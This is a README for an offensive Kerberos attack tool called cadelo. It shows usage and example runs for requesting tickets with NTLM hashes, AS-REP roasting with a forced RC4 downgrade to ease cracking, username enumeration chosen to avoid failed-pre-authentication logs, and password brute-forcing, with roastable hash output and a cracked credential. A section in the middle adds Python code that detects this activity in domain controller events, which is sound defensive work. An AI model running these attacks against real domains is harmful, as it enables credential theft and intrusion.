# cadelo

A tool to interact with and attack the Kerberos protocol, based on the kerbeiros library.

Compatible with Linux and Windows.

Still in development...

### To build

```
git clone https://gitlab.com/Zer1t0/cadelo
cd cadelo
cargo build --release
cd target/release/
./cadelo -h
```

## AskTGT

Get a Kerberos TGT

### Usage

```
$ ./cadelo asktgt -h
cadelo-asktgt
Zer1t0
Get a Kerberos TGT

USAGE:
    cadelo asktgt [OPTIONS] --domain --username <--password |--ntlm |--aes-128 |--aes-256 >

FLAGS:
    -h, --help       Prints help information
    -V, --version    Prints version information

OPTIONS:
        --aes-128          AES 128 Kerberos key of user
        --aes-256          AES 256 Kerberos key of user
    -d, --domain           Domain to brute-force
    -k, --kdc-ip           The address of the KDC
        --ntlm             NTLM hash of user
        --out-file         File to save TGT.
    -p, --password         Password of user
        --ticket-format    Format to save retrieved tickets. [default: ccache] [possible values: krb, ccache]
    -u, --username         Username what TGT is for
```

### Examples

Requesting a TGT by using the NTLM hash of the user's password:

```
$ ./cadelo asktgt -d kingdom.hearts -u mickey --ntlm 7ED026C3D202555DB1F8A8BA91C67C27 --kdc-ip 10.0.0.1
[+] Saved TGT into mickey.ccache
```

## ASREPRoast

Searches for users that do not require Kerberos pre-authentication; it also enumerates usernames.

### How it works

The asreproast command sends Kerberos AS-REQ messages in order to discover users that do not require Kerberos pre-authentication. For such users the KDC answers with an AS-REP that includes a part encrypted with a key derived from the user's password; the tool returns this encrypted part formatted so it can be cracked with John the Ripper or Hashcat.

By default the client tells the server that the AES-256, AES-128 and RC4 ciphers are allowed, so the response will most likely come encrypted with AES-256, which is harder to crack. The --cipher option lets you specify the cipher algorithm advertised to the server, forcing the response to be encrypted with a weaker cipher such as RC4.

Finally, this tool can also be used to enumerate users, since it reports whether a user exists or not. The difference from the brute command is that this method does not generate logs of type 4771 (Kerberos pre-authentication failed), only logs of type 4768 (A Kerberos authentication ticket (TGT) was requested).

### Generated logs

This tool generates the following log in a Windows Domain Controller:

* 4768 - A Kerberos authentication ticket (TGT) was requested

### Usage

```
$ ./cadelo asreproast -h
cadelo-asreproast
AS-REP roast attack

USAGE:
    cadelo asreproast [FLAGS] [OPTIONS] --domain <--username |--usernames >

FLAGS:
    -h, --help       Prints help information
        --udp        Use of UDP instead of TCP
    -V, --version    Prints version information
    -v, --verbose    Verbose

OPTIONS:
        --cipher          Encryption algorithm requested to server. [possible values: rc4, aes128, aes256]
        --crack-format    Format to save non preauth responses. [default: hashcat] [possible values: hashcat, john]
    -d, --domain          Domain to brute-force
    -k, --kdc-ip          The address of the KDC
        --out-file        File to save discovered non preauth responses. It is in hashcat or john format.
    -t, --threads         Number of threads [default: 1]
    -u, --username        User to check
        --usernames       File with username per line
```

### Example

Look for users without Kerberos pre-authentication required, given a list of usernames:

```
$ ./cadelo asreproast -d kingdom.hearts --usernames users.txt -vv
[-] Invalid admin
[-] Invalid root
[*] Valid mickey
[-] Invalid bob
[*] Valid roxas : No Preauth
[*] To crack roxas $krb5asrep$18$roxas@KINGDOM.HEARTS:4b494e47444f4d2e484541525453726f786173$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
[*] Valid xion

== Execution summary ==

[+] 1 users without pre-auth required were discovered, good luck on crack
```

## Brute

Utility to perform a brute-force attack against the Kerberos protocol. Be careful: user accounts can get locked out while performing this attack.

### How it works

The brute command combines the usernames and passwords provided and tests every combination. In this way it is possible to test a single password against several users, or many passwords against one user. When a user's password is discovered, the TGT obtained with it is also saved for future use (this can be disabled with the --no-save-ticket flag). The discovered credentials can be saved to a file with the --output-passwords option.

Furthermore, by processing the Kerberos errors, the tool reports whether a username exists or not. In the same way, it also indicates whether a user account is locked or disabled.

Finally, if a user without Kerberos pre-authentication required is discovered, the tool reports it and returns the encrypted part of the AS-REP message in John the Ripper or Hashcat format so it can be cracked later to obtain the user's password. (These results can also be saved to a file with the --output-non-preauth option.)

### Generated logs

This tool generates the following logs in a Windows Domain Controller:

* 4768 - A Kerberos authentication ticket (TGT) was requested
* 4771 - Kerberos pre-authentication failed
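The 4768/4771 events listed for asreproast (above) and brute are what a domain controller records. The following is an added detection example, not part of cadelo, that triages a constructed set of simplified event records for the three patterns this README describes: a successful TGT request with pre-authentication type 0 (and whether RC4 was negotiated), a client asking for TGTs of many non-existent users, and a client failing pre-authentication across many accounts. The field names and sample events are assumptions, not raw event-log output.

```python
"""Triage of constructed 4768/4771 events for the activity described in this README.
Added example, not part of cadelo; field names are simplified, not raw EVTX fields."""
from collections import defaultdict

# Kerberos result codes and encryption type as Windows reports them on 4768/4771.
KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6   # 4768 result: username does not exist (enumeration signal)
KDC_ERR_PREAUTH_FAILED = 0x18       # 4771 failure: wrong password supplied
ETYPE_RC4_HMAC = 0x17               # 4768 ticket encryption type when RC4 was negotiated
# Constructed sample: 10.0.0.50 enumerates/roasts, 10.0.0.60 guesses passwords, 10.0.0.70 is benign.
# 0x12 on a 4768 result code means the account is disabled or locked out.
SAMPLE_EVENTS = [
    {"ip": "10.0.0.50", "id": 4768, "user": "admin",  "code": 0x6,  "preauth": None, "etype": None},
    {"ip": "10.0.0.50", "id": 4768, "user": "root",   "code": 0x6,  "preauth": None, "etype": None},
    {"ip": "10.0.0.50", "id": 4768, "user": "roxas",  "code": 0x0,  "preauth": 0,    "etype": 0x17},
    {"ip": "10.0.0.50", "id": 4768, "user": "xion",   "code": 0x12, "preauth": None, "etype": None},
    {"ip": "10.0.0.60", "id": 4771, "user": "mickey", "code": 0x18, "preauth": None, "etype": None},
    {"ip": "10.0.0.60", "id": 4771, "user": "bob",    "code": 0x18, "preauth": None, "etype": None},
    {"ip": "10.0.0.60", "id": 4771, "user": "xion",   "code": 0x18, "preauth": None, "etype": None},
    {"ip": "10.0.0.70", "id": 4768, "user": "mickey", "code": 0x0,  "preauth": 2,    "etype": 0x12},
]

def asrep_roast_candidates(events):
    """Successful TGT requests with Pre-Authentication Type 0: the account does not require
    pre-auth, so its AS-REP can be taken offline. Returns {user: rc4_was_negotiated}."""
    found = {}
    for e in events:
        if e["id"] == 4768 and e["code"] == 0x0 and e["preauth"] == 0:
            found[e["user"]] = e["etype"] == ETYPE_RC4_HMAC
    return found

def enumeration_sources(events, min_unknown=2):
    """Client IPs that requested TGTs for several non-existent users (4768 with result 0x6)."""
    unknown = defaultdict(set)
    for e in events:
        if e["id"] == 4768 and e["code"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            unknown[e["ip"]].add(e["user"])
    return {ip for ip, users in unknown.items() if len(users) >= min_unknown}

def password_guess_sources(events, min_users=3):
    """Client IPs with pre-auth failures (4771 / 0x18) across many distinct accounts."""
    failed = defaultdict(set)
    for e in events:
        if e["id"] == 4771 and e["code"] == KDC_ERR_PREAUTH_FAILED:
            failed[e["ip"]].add(e["user"])
    return {ip for ip, users in failed.items() if len(users) >= min_users}

if __name__ == "__main__":
    print(asrep_roast_candidates(SAMPLE_EVENTS))   # {'roxas': True}
    print(enumeration_sources(SAMPLE_EVENTS))      # {'10.0.0.50'}
    print(password_guess_sources(SAMPLE_EVENTS))   # {'10.0.0.60'}
```

The thresholds are deliberately low for the eight sample events; on real telemetry they would be tuned per source and time window.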

### Usage

```
$ ./cadelo brute -h
cadelo-brute
Zer1t0
Bruteforce attack

USAGE:
    cadelo brute [FLAGS] [OPTIONS] --domain <--password |--passwords > <--username |--usernames >

FLAGS:
    -h, --help              Prints help information
        --no-save-ticket    Do saved the retrieved tickets
        --udp               Use of UDP instead of TCP
    -V, --version           Prints version information
    -v, --verbose           Verbose

OPTIONS:
        --crack-format          Format to save non preauth responses. [default: hashcat] [possible values: hashcat, john]
    -d, --domain                Domain to brute-force
    -k, --kdc-ip                The address of the KDC
        --output-non-preauth    File to save discovered non preauth responses. It is in hashcat or john format.
        --output-passwords      File to save discovered user:password per line
    -p, --password              Password to brute-force
        --passwords             File with password per line
    -t, --threads               Number of threads [default: 1]
        --ticket-format         Format to save retrieved tickets. [default: ccache] [possible values: krb, ccache]
    -u, --username              Username to brute-force
        --usernames             File with username per line
```

### Example

Brute-force with a list of usernames and passwords:

```
$ ./cadelo brute -d kingdom.hearts --usernames users.txt --passwords passwords.txt -vvv
[-] Invalid admin
[-] Invalid root
[*] Valid mickey
[-] Invalid bob
[*] Valid roxas : No Preauth
[*] To crack roxas $krb5asrep$18$roxas@KINGDOM.HEARTS:4b494e47444f4d2e484541525453726f786173$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
[!] Blocked/Disabled xion
[+] STUPENDOUS mickey:Minnie1234
[+] Saved mickey ticket into mickey.ccache

== Execution summary ==

[+] Great, 1 user passwords were discovered
[+] 1 users without pre-auth required were discovered, good luck on crack
```